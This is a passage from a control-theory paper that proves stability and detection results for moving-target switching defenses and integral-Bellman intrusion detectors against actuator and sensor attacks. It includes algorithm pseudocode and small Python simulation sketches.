Proof: For ease of exposition, we denote the time interval under consideration by $[t_0,t_1]$. Let $x^{\star}(t)$ be the trajectory of the system driven by (7) in the absence of attacks, and $x_c(t)$ the actual, possibly compromised, trajectory. We also assume, without loss of generality, that for $t \leq t_0$ there is no attack on the system; therefore, the optimal trajectory coincides with the actual one, $x^{\star}(t_0) = x_c(t_0) = x(t_0)$. The optimal and actual trajectories evolve according to

$$\dot{x}^{\star}(t) = (A - B_iK_i)x^{\star}(t), \quad x^{\star}(t_0) = x(t_0)$$
$$\dot{x}_c(t) = (A - B_i\Xi(t)K_i)x_c(t), \quad x_c(t_0) = x(t_0).$$

Since we consider attack signals that may be integrable but discontinuous, the trajectories $x_c(t)$ are defined in the sense of Caratheodory. First, we rewrite the actual trajectory of the system for $t \in [t_0,t_1]$ as

$$\dot{x}_c = (A - B_iK_i)x_c + B_i(I - \Xi)K_i x_c. \tag{21}$$

The solution to (21), with $B_i(I-\Xi)K_i x_c$ taken as a forcing term, is

$$x_c(t) = e^{(A-B_iK_i)(t-t_0)}x_c(t_0) + \int_{t_0}^{t}e^{(A-B_iK_i)(t-\tau)}B_i(I-\Xi(\tau))K_i x_c(\tau)\,d\tau.$$

Taking norms yields

$$\|x_c(t)\| \leq \|e^{(A-B_iK_i)(t-t_0)}\|\|x(t_0)\| + \int_{t_0}^{t}\|e^{(A-B_iK_i)(t-\tau)}\|\|B_i\|\|I-\Xi(\tau)\|\|K_i\|\|x_c(\tau)\|\,d\tau.$$

Since each controller $K_i$ renders the system stable, the transition matrix of the closed-loop system is upper bounded. Therefore, we can introduce $\kappa_i = \max_{t}\|e^{(A-B_iK_i)(t-t_0)}\|$.
Denoting $\alpha_i(\tau) = \|e^{(A-B_iK_i)(\tau-t_0)}\|\|B_i\|\|K_i\|$, we have

$$\|x_c(t)\| \leq \kappa_i\|x(t_0)\| + \int_{t_0}^{t}\alpha_i(\tau)\|I-\Xi(\tau)\|\|x_c(\tau)\|\,d\tau.$$

It has been shown in [37] that, under integrability assumptions, Gronwall-type inequalities hold for discontinuous functions inside the integral, such as $\alpha_i(\tau)\|I-\Xi(\tau)\|$. Applying these results yields a bound on the norm of the actual trajectory:

$$\|x_c(t)\| \leq \kappa_i\|x(t_0)\|\,e^{\int_{t_0}^{t}\alpha_i(\tau)\|I-\Xi(\tau)\|\,d\tau}. \tag{22}$$

We can now define the error between the actual and the optimal trajectory as

$$e_x(t) = x_c(t) - x^{\star}(t) \tag{23}$$

with dynamics given by

$$\dot{e}_x = \dot{x}_c - \dot{x}^{\star} = (A - B_i\Xi K_i)x_c - (A - B_iK_i)x^{\star} = (A - B_iK_i)e_x + B_i(I - \Xi)K_i x_c.$$

Due to the assumption that $x^{\star}(t_0) = x_c(t_0)$, we have $e_x(t_0) = 0$ and

$$e_x(t) = \int_{t_0}^{t}e^{(A-B_iK_i)(t-\tau)}B_i(I - \Xi(\tau))K_i x_c(\tau)\,d\tau$$

which, after taking norms, yields

$$\|e_x(t)\| \leq \int_{t_0}^{t}\|e^{(A-B_iK_i)(t-\tau)}\|\|B_i\|\|I-\Xi(\tau)\|\|K_i\|\|x_c(\tau)\|\,d\tau.$$

Utilizing now the bound (22), we can further write

$$\|e_x(t)\| \leq \int_{t_0}^{t}\alpha_i(\tau)\|I-\Xi(\tau)\|\|x(t_0)\|\,e^{\int_{t_0}^{\tau}\alpha_i(s)\|I-\Xi(s)\|\,ds}\,d\tau.$$

By using

$$\beta_i(t,\Xi) = \int_{t_0}^{t}\alpha_i(\tau)\|I-\Xi(\tau)\|\,e^{\int_{t_0}^{\tau}\alpha_i(s)\|I-\Xi(s)\|\,ds}\,d\tau$$

for which $\beta_i(t,\Xi) \neq 0$ for all $\Xi \neq I$, we can write the bound on the trajectory error as

$$\|e_x(t)\| \leq \beta_i(t,\Xi)\|x(t_0)\|. \quad \blacksquare$$

Remark 7: It can be seen that $\beta_i(\cdot,\Xi) = 0$ if and only if $\Xi(t) = I$, $\forall t \in [t_0,t_1]$. □

Theorem 3: Consider that the system is operating with $K_i \in K$, designed based on (7) and (8).
Define the detection signal over a predefined time window $T > 0$ as

$$e(t) = V_i(x_c(t-T)) - V_i(x_c(t)) - \int_{t-T}^{t}\left(x_c^{T}Q_i x_c + u_i^{\star T}R_i u_i^{\star}\right)d\tau. \tag{24}$$

Then, the system is under attack if and only if $e(t) \neq 0$. The optimality loss due to the attacks, quantified by $\|e(t)\|$, is bounded for any injected signal $\Xi(t)$ that is integrable.

Proof: As was proven in [38], (24) is the integral form of the Bellman equation. For the sampled value of the state at $t_1 = t - T$, we have that

$$V_i^{\star}(t-T) = x^{T}(t-T)P_i x(t-T) = \min_{u_i}\left\{\int_{t-T}^{t}\left(x^{T}Q_i x + u_i^{T}R_i u_i\right)d\tau + V_i^{\star}(t)\right\}.$$

Since $P_i \succ 0$, we have

$$V_i^{\star}(t-T) = \min_{u_i}\left\{\int_{t-T}^{t}\left(x^{T}Q_i x + u_i^{T}R_i u_i\right)d\tau\right\} + x^{T}(t)P_i x(t).$$

For the accumulated cost utilizing the optimal input, and the cost utilizing an arbitrary input $u_a$, it holds that

$$\int_{t-T}^{t}\left(x^{T}Q_i x + u_i^{\star T}R_i u_i^{\star}\right)d\tau = \min_{u_i}\left\{\int_{t-T}^{t}\left(x^{T}Q_i x + u_i^{T}R_i u_i\right)d\tau\right\} \leq \int_{t-T}^{t}\left(x^{T}Q_i x + u_a^{T}R_i u_a\right)d\tau$$

i.e.,

$$\int_{t-T}^{t}\left(x^{T}Q_i x + u_i^{\star T}R_i u_i^{\star}\right)d\tau = \int_{t-T}^{t}\left(x^{T}Q_i x + u_a^{T}R_i u_a\right)d\tau - I(\Xi)$$

for some $I(\Xi) \geq 0$. Due to Assumption 4, the solution is unique; by extension, the optimal cost over any time interval is also unique. Consequently, the system is attack-free exactly when $I(\Xi) = 0$.

For the boundedness part of the proof, we adopt the notation of Lemma 1. Along the actual trajectory of the system within a time interval $[t_0,t_1]$, the intrusion detection signal is

$$e(t) = x_c^{T}(t_0)P_i x_c(t_0) - x_c^{T}(t_1)P_i x_c(t_1) - \int_{t_0}^{t_1}\left(x_c^{T}(\tau)Q_i x_c(\tau) + u_i^{\star T}(x_c)R_i u_i^{\star}(x_c)\right)d\tau.$$
Since the control signal utilized by the controller is optimal, we can write, for all $t \geq 0$,

$$e(t) = x_c^{T}(t_0)P_i x_c(t_0) - x_c^{T}(t_1)P_i x_c(t_1) - \int_{t_0}^{t_1}\left(x_c^{T}(\tau)Q_i x_c(\tau) + \left(R_i^{-1}B_i^{T}P_i x_c(\tau)\right)^{T}R_i\left(R_i^{-1}B_i^{T}P_i x_c(\tau)\right)\right)d\tau = x_c^{T}(t_0)P_i x_c(t_0) - x_c^{T}(t_1)P_i x_c(t_1) - \int_{t_0}^{t_1}x_c^{T}(\tau)\bar{Q}_i x_c(\tau)\,d\tau$$

where $\bar{Q}_i = Q_i + P_iB_iR_i^{-1}B_i^{T}P_i \succ 0$. The positive definiteness is derived from the asymptotic stability property of the optimal closed-loop system.

We substitute the actual trajectory $x_c(t)$, utilizing the trajectory error (23), to write

$$e(t) = x_c^{T}(t_0)P_i x_c(t_0) - \left(x^{\star}(t_1) + e_x(t_1)\right)^{T}P_i\left(x^{\star}(t_1) + e_x(t_1)\right) - \int_{t_0}^{t_1}\left(x^{\star}(\tau) + e_x(\tau)\right)^{T}\bar{Q}_i\left(x^{\star}(\tau) + e_x(\tau)\right)d\tau$$

which can be rewritten as

$$e(t) = x_c^{T}(t_0)P_i x_c(t_0) - x^{\star T}(t_1)P_i x^{\star}(t_1) - \int_{t_0}^{t_1}x^{\star T}(\tau)\bar{Q}_i x^{\star}(\tau)\,d\tau - \left\{e_x^{T}(t_1)P_i x^{\star}(t_1) + x^{\star T}(t_1)P_i e_x(t_1) + e_x^{T}(t_1)P_i e_x(t_1) + \int_{t_0}^{t_1}\left(e_x^{T}(\tau)\bar{Q}_i x^{\star}(\tau) + x^{\star T}(\tau)\bar{Q}_i e_x(\tau) + e_x^{T}(\tau)\bar{Q}_i e_x(\tau)\right)d\tau\right\}.$$

It can be seen that the first three terms of this expression satisfy the integral form of the HJB equation and therefore vanish. As a result, the residual terms that quantify the optimality loss due to the attack are

$$e(t) = -\left\{e_x^{T}(t_1)P_i x^{\star}(t_1) + x^{\star T}(t_1)P_i e_x(t_1) + e_x^{T}(t_1)P_i e_x(t_1) + \int_{t_0}^{t_1}\left(e_x^{T}(\tau)\bar{Q}_i x^{\star}(\tau) + x^{\star T}(\tau)\bar{Q}_i e_x(\tau) + e_x^{T}(\tau)\bar{Q}_i e_x(\tau)\right)d\tau\right\}.$$

Taking norms, and utilizing the fact that $x^{\star}(t) = e^{(A-B_iK_i)(t-t_0)}x(t_0)$ as well as Lemma 1, we can bound the norm of the intrusion detection signal as

$$\|e(t)\| \leq b_i(t,\Xi)\|x(t_0)\|^2$$

where

$$b_i(t,\Xi) = 2\beta_i(t,\Xi)\|P_i\|\kappa_i + \beta_i^2(t,\Xi)\|P_i\| + \int_{t_0}^{t}\left(2\beta_i(\tau,\Xi)\|\bar{Q}_i\|\kappa_i + \beta_i^2(\tau,\Xi)\|\bar{Q}_i\|\right)d\tau$$

with the property that $b_i(t,\Xi) = 0$, $\forall t \in [t_0,t_1]$, if and only if $\Xi(t) = I$.
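On sampled data, the detection signal (24) reduces to a windowed sum. A minimal sketch (forward-Euler sampling, so the attack-free error is only numerically zero; the scalar toy mode is hypothetical):

```python
import numpy as np

def integral_bellman_error(xs, us, P, Q, R, dt):
    """Sampled version of the detection signal (24):
    e = V_i(x[0]) - V_i(x[-1]) - sum_k (x_k' Q x_k + u_k' R u_k) dt,
    with V_i(x) = x' P_i x and u_k the commanded optimal inputs."""
    V0, V1 = xs[0] @ P @ xs[0], xs[-1] @ P @ xs[-1]
    run = sum((x @ Q @ x + u @ R @ u) * dt for x, u in zip(xs[:-1], us))
    return V0 - V1 - run

# Toy scalar mode (A = 0, B = 1, Q = R = 1 => P = 1, K = 1), Euler-sampled.
P = Q = R = K = np.eye(1)
def rollout(actuation_scale, steps=1000, dt=1e-3):
    x, xs, us = np.array([1.0]), [np.array([1.0])], []
    for _ in range(steps):
        u = -(K @ x)                        # commanded optimal input
        x = x + dt * (actuation_scale * u)  # attacker scales the actuation
        xs.append(x.copy()); us.append(u)
    return integral_bellman_error(xs, us, P, Q, R, dt)

e_clean, e_attacked = rollout(1.0), rollout(0.5)
```

Here the attack $\Xi = 0.5$ halves the applied actuation: the clean run leaves only a small discretization residual, while the attacked run produces a clearly nonzero signal.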
■

Remark 8: We note that, in the notation of Lemma 1 and Theorem 3, the state trajectories $x^{\star}(t), x_c(t)$ and the error signals $e_x(t), e(t)$ are not indexed by the active mode $i$, even though their dynamics are. This is because the different modes operate sequentially, so the defender computes only a single error signal at each time instant. □

Algorithm 1: Proactive/Reactive Defense Mechanism for Actuator Attacks.
1: procedure
2: Given an initial state $x(t_0)$ and a time window $T$.
3: Find all permutations of actuators (columns of $B$) and derive the subset of controllable pairs $(A,B_i)$, denoted by $K$.
4: for $i = 1,\ldots,\operatorname{card}(K)$
5: Compute the optimal feedback gain and Riccati matrix $K_i, P_i$ according to (7) and (9).
6: Compute the optimal cost of each controller for the given $x(t_0)$.
7: end for
8: Solve for the optimal probabilities $p_i^{\star}$ using (10).
9: At $t = t_0$, choose the optimal controller, $\sigma(t_0) = \arg\min_i\left(x(t_0)^{T}P_i x(t_0)\right)$.
10: while $\sigma(t) = i$ and $t < \tau_D$
11: Compute the integral Bellman error detection signal using (24).
12: Propagate the system using (5).
13: end while
14: Choose a random mode $\sigma(t + \tau_D) = j$ and go to 9.
15: if $\|e_i(t_c)\| > 0$
16: Take the $i$th controller offline.
17: Switch to the controller with the best performance, $\sigma(t_c) = \arg\min_{i \in K\setminus i}\left(x(t_0)^{T}P_i x(t_0)\right)$, and go to 9.
18: end if
19: end procedure

D. Proactive and Reactive Defense for Actuator Attacks

Under safe operation, the system switches between the available modes with MTD in order to have guaranteed stability and maximal unpredictability, according to (11). If we can find $i$ such that $e_i(t_k) \neq 0$, then we conclude that the $i$th mode is under attack, and it is isolated.
Specifically, the system switches to the controller with the best performance, and the compromised $i$th mode is taken out of the queue for the MTD switching. The pseudocode for the proactive and reactive defense system is provided in Algorithm 1.

Fact 3: It has been shown that $p_i > 0$, $\forall i \in \{1,\ldots,\operatorname{card}(K)\}$. Consequently, there exists a $\bar{t}_f$ such that over $[t_0,\bar{t}_f]$ we have $\sigma(\tau) = i$ for some $\tau$, for every $i \in \{1,\ldots,\operatorname{card}(K)\}$ and an arbitrary $t_0 > 0$. This means that, since every controller will eventually be active with positive probability, there is some time interval long enough that the system has already switched through every available controller. □

Theorem 4: Suppose that system (1) uses the framework of Algorithm 1. Then, the closed-loop system has an asymptotically stable equilibrium point, given that the attacker has not compromised all the available controllers, i.e., $K\setminus K_c \neq \emptyset$, where $K_c$ is the subset of those controllers that have been compromised by an attacker.

Proof: We consider a trajectory of the system within the time interval $t \in [t_0,t_f]$, $t_f > \bar{t}_f$. Denote by $K_u$ the set of safe controllers and by $K_c$ the set of compromised ones. Recall that, according to Algorithm 1 and Theorem 3, the controller stays at a compromised mode during $[t, t+T]$. Since the MTD algorithm is constrained by an average dwell time, for any part of the trajectory $t \in [t_k,t_{k+1}]$ where a compromised controller has not been utilized, it holds according to Theorem 2 that

$$\|x(t_{k+1})\| < \|x(t_k)\|. \tag{25}$$

We now need to take into account those instances where, after detecting a compromised controller $K_i$, the system immediately switches to another controller that is also compromised.
For $\bar{N}$ subsequent switches to compromised controllers, due to Lemma 1, the corresponding parts of the trajectory, $t \in [t_k, t_k + \nu T]$, are bounded by a positive definite function $\beta_i(\cdot,\Xi)$ as

$$\|x(t_k + \nu T)\| \leq \beta_{\sigma(t_k+\nu T)}(\Xi,T)\|x(t_k + (\nu-1)T)\| \leq \beta_{\sigma(t_k+\nu T)}(\Xi,T)\,\beta_{\sigma(t_k+(\nu-1)T)}(\Xi,T)\|x(t_k + (\nu-2)T)\| \leq \cdots \leq \prod_{i=1}^{\nu}\beta_i(\Xi,T)\|x(t_k)\|. \tag{26}$$

Furthermore, (26) can be upper bounded as

$$\|x(t_k + \nu T)\| \leq \left(\max_{i\in K_c}\beta_i(\Xi,T)\right)^{\nu}\|x(t_k)\|.$$

Due to the fact that $\beta_i(\Xi(t),T) > 0$, $\forall i$, we can conclude, by combining the inequalities (25) and (26), that the parts of the trajectory where the compromised and safe modes are interchanged are upper bounded by the same trajectory driven only by compromised modes.

By Assumption 3, the attacker, having finite resources, is able to compromise a number $N$ of the available controllers, i.e., $\operatorname{card}(K_c) \leq N$. Using Algorithm 1 and Fact 3, there is a time $t_p < t_f$ such that all the compromised controllers have been detected by the integral Bellman detector and have been isolated from the switching queue of the MTD. Consequently, recalling that every closed-loop matrix $A_i = A - B_iK_i$ is Hurwitz, there exist positive numbers $\kappa_i, a_i$ such that $\|e^{A_i t}\| \leq \kappa_i e^{-a_i t}$, and one has

$$\|x(t_f)\| \leq \kappa_i e^{-a_i t}\|x(t_p)\| \leq \kappa_i e^{-a_i t}\left(\max_{i\in K_c}\beta_i(\Xi,T)\right)^{\nu}\|x(t_0)\|.$$

It can be seen that the remaining trajectory converges to the origin exponentially fast, with a rate that depends on the slowest safe controller. As a result, if the set of safe controllers is not empty, the trajectory is guaranteed to go to zero asymptotically as $t_f \to \infty$.
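A compact sketch of how Algorithm 1's proactive/reactive loop fits together. The simulation setup, the $\Xi = 0$ attack model, the choice $R_i = I$, $\epsilon = 1$, and the 10% relative detection threshold are all illustrative assumptions, not the paper's choices:

```python
import numpy as np
from scipy.linalg import solve_continuous_are

def mtd_defense_loop(A, B_modes, Q, x0, dt, dwell, n_windows, rng,
                     attacked=frozenset()):
    """Illustrative sketch of Algorithm 1 (R_i = I for brevity): switch
    randomly among surviving LQR modes with cost-weighted probabilities
    (cf. (10), eps = 1); per dwell window accumulate the integral Bellman
    error (24) and take a mode offline when its relative error is large.
    Modes in `attacked` have their actuation nulled (Xi = 0)."""
    Ps, Ks = [], []
    for Bi in B_modes:
        P = solve_continuous_are(A, Bi, Q, np.eye(Bi.shape[1]))
        Ps.append(P); Ks.append(Bi.T @ P)       # K_i = R^{-1} B_i' P_i, R = I
    alive, x = list(range(len(B_modes))), np.array(x0, float)
    for _ in range(n_windows):
        V = np.array([x @ Ps[i] @ x for i in alive])
        w = np.exp(-(V - V.min())); w /= w.sum()  # softmax over costs, cf. (10)
        i = alive[rng.choice(len(alive), p=w)]
        V_start, run = x @ Ps[i] @ x, 0.0
        for _ in range(dwell):
            u = -Ks[i] @ x                        # commanded input
            ua = np.zeros_like(u) if i in attacked else u
            run += (x @ Q @ x + u @ u) * dt
            x = x + dt * (A @ x + B_modes[i] @ ua)
        e = V_start - x @ Ps[i] @ x - run         # signal (24)
        if abs(e) > 0.1 * max(V_start, 1e-9) and len(alive) > 1:
            alive.remove(i)                       # reactive isolation
    return x, alive
```

An attacked mode is removed the first time it is activated, after which the random switching continues over the surviving modes, mirroring the behavior described above.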
■

1) Intrusion Detection Under Actuation Noise: It is possible to extend the results of the previous section to take into account noise in the actuation mechanism, i.e., in (1),

$$u_a(t) = \Xi(t)u^{\star}(t) + w(t)$$

where $w(t)$ is a bounded but otherwise unknown disturbance with $\|w(t)\| \leq \bar{w}$.

Theorem 5: System (1), equipped with the MTD control scheme described in Section III and the detection mechanism defined in Theorem 3, under the effect of a disturbance $w(t)$, is compromised if

$$\|e(t)\| \geq e_{i,\mathrm{thres}}(t)$$

where the $e_{i,\mathrm{thres}}$ are dynamic thresholds, one per mode, of the form

$$e_{i,\mathrm{thres}}(t) = 2\bar{w}\int_{t-T}^{t}\|R_i u_i^{\star}(\tau)\|\,d\tau + T\bar{\lambda}(R_i)\bar{w}^2.$$

Proof: First, we consider the system in the absence of attacks and formulate the intrusion detection signal based on the data collected along the trajectories of the system. In other words, we can write

$$e(t) = V_i^{\star}(t-T) - V_i^{\star}(t) - \int_{t-T}^{t}\left(x^{T}Q_i x + u_a^{T}R_i u_a\right)d\tau = V_i^{\star}(t-T) - V_i^{\star}(t) - \int_{t-T}^{t}\left(x^{T}Q_i x + (u^{\star}+w)^{T}R_i(u^{\star}+w)\right)d\tau = V_i^{\star}(t-T) - V_i^{\star}(t) - \int_{t-T}^{t}\left(x^{T}Q_i x + u_i^{\star T}R_i u_i^{\star}\right)d\tau - \int_{t-T}^{t}\left(w^{T}R_i u^{\star} + u_i^{\star T}R_i w + w^{T}R_i w\right)d\tau.$$
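The threshold of Theorem 5 uses only the commanded inputs and is therefore directly computable online. A sketch, assuming the window is supplied as uniformly sampled commanded inputs (the example values are illustrative):

```python
import numpy as np

def adaptive_threshold(u_star_window, R, w_bar, dt):
    """Dynamic threshold of Theorem 5 for the active mode i:
    e_thres = 2 w_bar * int ||R u_i*|| dtau + T * lmax(R) * w_bar^2,
    computed from the commanded inputs u_i* only, not the corrupted ones."""
    integral = sum(np.linalg.norm(R @ u) for u in u_star_window) * dt
    T = len(u_star_window) * dt
    return 2.0 * w_bar * integral + T * np.linalg.eigvalsh(R).max() * w_bar ** 2

# Illustrative window: constant unit input over T = 1 s, noise bound 0.1.
thr = adaptive_threshold([np.array([1.0])] * 100, np.eye(1), 0.1, 0.01)
# thr = 2*0.1*1 + 1*1*0.01 = 0.21
```

The detector then flags an attack only when the windowed integral Bellman error exceeds this noise-induced floor.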
Leveraging the integral Bellman equality and taking norms yields

$$\|e(t)\| \leq 2\int_{t-T}^{t}\|w^{T}R_i u_i^{\star}\|\,d\tau + \int_{t-T}^{t}\|w^{T}R_i w\|\,d\tau \leq 2\bar{w}\int_{t-T}^{t}\|R_i u_i^{\star}(\tau)\|\,d\tau + T\bar{\lambda}(R_i)\bar{w}^2$$

which is the adaptive threshold for the active controller $i$. ■

Remark 9: It should be noted that the adaptive threshold can be computed online utilizing only knowledge of the optimal input signal that the controller sends to the system (and not the potentially corrupted one). □

Remark 10: In noisy environments, the system may be under attack while the integral Bellman error does not cross the adaptive threshold; such an attack remains undetected. However, attacks that have so little effect on the system become indistinguishable from random noise and do not degrade the performance of the system in a significant way. □

IV. DEFENSE AGAINST SENSOR ATTACKS

In this section, we show how the methods developed can be applied to securely estimate the state of a system with compromised measurements by employing sensor redundancy.

A. Candidate Sensor Sets

Similarly to the proposed framework for the actuators, we introduce the set of all sensors, denoted by $C$, and the elements of its power set, $C_i \in 2^{C}$, where each $C_i$ is a combination of different rows of $C$. The set of candidate sensing modes $S_o$ is defined as the set of sensor combinations that render system (1) fully observable:

$$S_o = \left\{ C_j \in 2^{C} : \operatorname{rank}\left(\begin{bmatrix} C_j \\ C_jA \\ \vdots \\ C_jA^{n-1} \end{bmatrix}\right) = n \right\}.$$

The system utilizing the sensor combination $C_i$ is

$$\dot{x} = Ax + Bu, \quad y_i = C_i x.$$

Remark 11: We note the distinction between the set of sensors $C$ and the set of sensing modes $S_o$. The set of sensors contains the different physical components that measure parts of the system's behavior.
On the other hand, the set of sensing modes contains those cooperating sensors together with an observer scheme that reconstructs an estimate of the system state. □

B. Optimal Observer Design and MTD for Sensor Attacks

The observer of (1) is now designed as a dynamic system sharing the same structural properties:

$$\dot{\hat{x}} = A\hat{x} + Bu + B\check{u}_i, \quad \hat{y}_i = C_i\hat{x} \tag{27}$$

where $\hat{x}, \hat{y}_i$ are the estimates of the state and the output, respectively, and $\check{u}_i$ denotes a fictional input, i.e., a correction term, which forces the observer to track the actual system.

Remark 12: The state estimate $\hat{x}$ is independent of the active sensing mode. On the other hand, the output $\hat{y}_i$ and the fictional input $\check{u}_i$ are not. □

Following the work of [39], [40], to design the optimal $\check{u}_i$, we define the optimization problem based on the following cost function, for $t \geq 0$:

$$U_i^{\star}(\hat{x}) = \min_{\check{u}_i}\int_{t}^{\infty}\left[(\hat{y}_i - y_i)^{T}Q_i(\hat{y}_i - y_i) + \check{u}_i^{T}R_i\check{u}_i\right]d\tau.$$

The Hamiltonian of the system is defined as

$$H_i(\hat{x},\check{u}_i,\nabla U_i) = (\hat{y}_i - y_i)^{T}Q_i(\hat{y}_i - y_i) + \check{u}_i^{T}R_i\check{u}_i + \nabla U_i^{T}(A\hat{x} + Bu + B\check{u}_i) = 0. \tag{28}$$

We can now find the optimal correction from the stationarity condition $\frac{\partial H_i(\hat{x},\check{u}_i,\nabla U_i)}{\partial \check{u}_i} = 0$, which leads to $\check{u}_i^{\star} = -\frac{1}{2}R_i^{-1}B^{T}\nabla U_i^{\star}(\hat{x})$. Due to the quadratic structure of the cost functional and the linear structure of the dynamic system, we assume that the value function is quadratic in $\hat{x}(t)$, i.e., $U_i^{\star}(\hat{x}) = \hat{x}^{T}G_i\hat{x}$, $G_i \succ 0$, which means that the optimal fictional input is

$$\check{u}_i^{\star} = -R_i^{-1}B^{T}G_i\hat{x}. \tag{29}$$

In the remainder of this section, we show how the same techniques introduced and analyzed in the previous sections can be applied to detect and mitigate sensor attacks.

C.
MTD for Sensor Attacks

Theorem 6: The state estimation scheme utilizing the optimal observers described by (27), for every sensing mode in $S_o$, has an asymptotically stable equilibrium point under a switching-based MTD mechanism, given that the switching signal has the average dwell time

$$\tau_D > \frac{\log\left(\max_{q,p\in\{1,\ldots,\operatorname{card}(S_o)\}}\frac{\bar{\lambda}(G_p)}{\underline{\lambda}(G_q)}\right)}{\min_{p\in\{1,\ldots,\operatorname{card}(S_o)\}}\frac{\underline{\lambda}\left(C_p^{T}Q_pC_p + G_pBR_p^{-1}B^{T}G_p\right)}{\bar{\lambda}(G_p)}}.$$

Proof: The proof follows closely that of Theorem 2, for the switched observer comprised of the different sensing modes, taking into account the optimal control problem formulated in this section through (28) and (29). ■

Remark 13: The optimization problem solved in Section III-C is identical for the case of sensor switching. As a result, the probability that a certain sensing mode $S_i$ is active obeys (10). □

D. Integral Bellman-Based Intrusion Detection for Sensor Attacks

We will now introduce a detection signal based on the online, possibly compromised, estimates of the state, which we denote by $\hat{x}_c(t)$. For that reason, we formulate the function $U_i(t) = \hat{x}_c^{T}G_i\hat{x}_c$, $G_i \succ 0$.

Theorem 7: Consider system (1) operating with the sensing mode $S_i \in S_o$, designed based on (28) and (29). Define the detection signal over a predefined time window $T > 0$ as

$$e_s(t) = U_i(\hat{x}_c(t-T)) - U_i(\hat{x}_c(t)) - \int_{t-T}^{t}\left((y_i - \hat{y}_i)^{T}Q_i(y_i - \hat{y}_i) + \check{u}_i^{\star T}R_i\check{u}_i^{\star}\right)d\tau. \tag{30}$$

Then, the system is under attack if and only if $e_s(t) \neq 0$. Moreover, the optimality loss due to the attacks is bounded for any injected signal $\Xi_s(t)$.

Proof: The first part of the proof follows from Theorem 3, for the optimal control problem formulated in this section, and is based on the uniqueness of optimal solutions for a given initial condition. However, to compute the bound on the optimality/observation loss, we define the measurement error $\tilde{y}_i = y_i - \hat{y}_i$. Then, the detection signal is

$$e_s(t) = U_i(\hat{x}_c(t-T)) - U_i(\hat{x}_c(t)) - \int_{t-T}^{t}\left(\tilde{y}_i^{T}Q_i\tilde{y}_i + \check{u}_i^{T}R_i\check{u}_i\right)d\tau.$$
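The sensing-mode enumeration and the observer correction (29) mirror the actuator-side constructions. A sketch, under the assumption (consistent with (28) and the estimation-error dynamics, but not stated explicitly in the text) that $G_i$ solves the Riccati equation with state weight $C_i^{T}Q_iC_i$; the example system is hypothetical:

```python
import itertools
import numpy as np
from scipy.linalg import solve_continuous_are

def candidate_sensing_modes(A, C):
    """Row subsets C_j of C passing the observability rank test defining
    S_o: rank [C_j; C_j A; ...; C_j A^{n-1}] = n."""
    n = A.shape[0]
    modes = []
    for r in range(1, C.shape[0] + 1):
        for rows in itertools.combinations(range(C.shape[0]), r):
            Cj = C[list(rows), :]
            O = np.vstack([Cj @ np.linalg.matrix_power(A, k) for k in range(n)])
            if np.linalg.matrix_rank(O) == n:
                modes.append(rows)
    return modes

def observer_correction_gain(A, B, Ci, Qi, Ri):
    """Gain of the fictional input (29), u_i = -R_i^{-1} B^T G_i xhat,
    assuming G_i solves the Riccati equation with state weight C_i^T Q_i C_i
    (the weight implied by the output-error cost in (28))."""
    Gi = solve_continuous_are(A, B, Ci.T @ Qi @ Ci, Ri)
    return np.linalg.solve(Ri, B.T @ Gi)

# Hypothetical example: double integrator with two redundant sensors.
A = np.array([[0.0, 1.0], [0.0, 0.0]])
C = np.eye(2)
modes = candidate_sensing_modes(A, C)   # the velocity sensor alone fails the test
B = np.array([[0.0], [1.0]])
L1 = observer_correction_gain(A, B, C[[0], :], np.eye(1), np.eye(1))
```

For this toy system only the position sensor (alone or with the velocity sensor) yields an observable pair, so $S_o$ has two sensing modes over which the observer-side MTD can switch.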
Note that, in the presence of attacks, the measurements become $y_i \mapsto \Xi_s C_i x$, so that

$$y_i - \hat{y}_i = \Xi_s C_i x - C_i\hat{x} = \tilde{y}_i + \delta_i^{s}(\Xi_s), \quad \delta_i^{s}(\Xi_s) = (\Xi_s - I)C_i x.$$

Therefore, the detection signal under attack is

$$e_s(t) = U_i(\hat{x}_c(t-T)) - U_i(\hat{x}_c(t)) - \int_{t-T}^{t}\left(\left(\tilde{y}_i + \delta_i^{s}(\Xi_s)\right)^{T}Q_i\left(\tilde{y}_i + \delta_i^{s}(\Xi_s)\right) + \check{u}_i^{T}R_i\check{u}_i\right)d\tau.$$

Expanding the quadratic terms, the residual detection signal becomes

$$e_s(t) = -\int_{t-T}^{t}\left(\delta_i^{sT}(\Xi_s)Q_i\tilde{y}_i + \tilde{y}_i^{T}Q_i\delta_i^{s}(\Xi_s) + \delta_i^{sT}(\Xi_s)Q_i\delta_i^{s}(\Xi_s)\right)d\tau.$$

Taking into account the Cauchy-Schwarz inequality, we can bound the norm of the error as

$$\|e_s(t)\| \leq 2\int_{t-T}^{t}\|\tilde{y}_i\|\|\delta_i^{s}(\Xi_s)\|\,d\tau + T\bar{\lambda}(Q_i)\sup_{\tau\in[t-T,t]}\|\delta_i^{s}(\Xi_s)\|^{2}. \quad \blacksquare$$

Remark 14: The bound on the optimality/observation loss can be quantified more easily here, because the injected attack does not directly affect the dynamics of system (1); rather, it behaves like noise in the cost term defined by the output error $(y_i - \hat{y}_i)^{T}Q_i(y_i - \hat{y}_i)$. □

Algorithm 2: Proactive/Reactive Defense Mechanism for Sensor Attacks.
1: procedure
2: Given an initial state $x(t_0)$, the system dynamics (1), and a time window $T$.
3: Find all permutations of sensors (rows of $C$) and derive the subset of observable pairs $(A,C_i)$, denoted by $S_o$.
4: for $i = 1,\ldots,\operatorname{card}(S_o)$
5: Compute the optimal fictional input and value function according to (28) and (29).
6: Compute the optimal cost of each observation mode for the given $x(t_0)$.
7: end for
8: Solve for the optimal probabilities $p_i^{\star}$ using (10).
9: At $t = t_0$, choose the optimal observer.
10: while $\sigma(t) = i$ and $t < \tau_D$
11: Compute the integral Bellman error detection signal using (30).
12: Propagate the system using the observer dynamics.
13: end while
14: Choose a random mode $\sigma(t + \tau_D) = j$ and go to 9.
15: if $\|e_s(t_c)\| > 0$
16: Take the $i$th observer offline.
17: Switch to the safe observer with the best performance and go to 9.
18: end if
19: end procedure

E. Proactive and Reactive Defense for Sensor Attacks

We will now combine the proactive defense mechanism with the intrusion detection system described above. The pseudocode for the operation is presented in Algorithm 2.

Remark 15: We can combine the algorithmic frameworks presented for actuator and sensor attacks. However, the result would be conservative, since the two problems are coupled. Consequently, we cannot differentiate between integral Bellman errors caused by an actuator attack and those caused by a sensor attack. □

V. SIMULATION

In order to show the effectiveness of our approaches, we use a linearized five-dimensional model of the ADMIRE benchmark aircraft [41]. The model has seven redundant actuators and two redundant sensors. Initially, we present results for the problem of controlling the plant in an adversarial environment.

